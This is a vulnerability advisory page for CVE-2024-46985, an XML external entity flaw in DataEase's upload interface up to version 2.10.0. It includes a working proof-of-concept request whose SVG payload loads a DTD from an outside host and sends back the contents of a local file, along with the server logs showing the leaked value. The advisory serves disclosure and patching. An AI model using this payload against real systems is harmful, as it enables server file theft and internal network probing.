Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-4m9p-7xg6-f4mm

Опубликовано: 23 сент. 2024
Источник: github
Github: Прошло ревью
CVSS4: 8.7
CVSS3: 7.5

Описание

DataEase has an XML External Entity Reference vulnerability

Impact

There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.

  1. send request:
POST /de2api/staticResource/upload/1 HTTP/1.1 Host: dataease.ubuntu20.vm Content-Length: 348 Accept: application/json, text/plain, */* out_auth_platform: default X-DE-TOKEN: jwt User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn ------WebKitFormBoundary6OZBNygiUCAZEbMn Content-Disposition: form-data; name="file"; filename="1.svg" Content-Type: a <?xml version='1.0'?> <!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'> %EvilDTD; %LoadOOBEnt; %OOB; ]> ------WebKitFormBoundary6OZBNygiUCAZEbMn-- // 1.dtd的内容 <!ENTITY % resource SYSTEM "file:///etc/alpine-release"> <!ENTITY % LoadOOBEnt "<!ENTITY &#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">
  1. After sending the request, the content of the file /etc/alpine-release is successfully read
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 - ::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -

Affected versions: <= 2.10.0

Patches

The vulnerability has been fixed in v2.10.1.

Workarounds

It is recommended to upgrade the version to v2.10.1.

References

If you have any questions or comments about this advisory:

Open an issue in https://github.com/dataease/dataease Email us at wei@fit2cloud.com

Ссылки

Пакеты

Наименование

io.dataease:common

maven
Затронутые версииВерсия исправления

<= 2.10.0

2.10.1

EPSS

Процентиль: 43%
0.00209
Низкий

8.7 High

CVSS4

7.5 High

CVSS3

CVE ID

CVE-2024-46985

Дефекты

CWE-611

Связанные уязвимости

nvd логотип

CVE-2024-46985

CVSS3: 7.5
nvd
больше 1 года назад

DataEase is an open source data visualization analysis tool. Prior to version 2.10.1, there is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading. The vulnerability has been fixed in v2.10.1.

EPSS

Процентиль: 43%
0.00209
Низкий

8.7 High

CVSS4

7.5 High

CVSS3

CVE ID

CVE-2024-46985

Дефекты

CWE-611